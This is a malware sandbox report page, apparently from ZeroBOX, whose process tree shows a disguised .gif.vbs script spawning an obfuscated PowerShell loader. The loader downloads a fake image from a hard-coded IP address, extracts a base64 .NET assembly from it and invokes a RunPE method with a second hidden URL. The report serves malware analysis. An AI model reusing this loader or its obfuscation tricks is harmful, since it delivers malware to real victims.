popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\profilegoodforinvestreturntogold.gif.vbs

    3044

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"

      2292

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf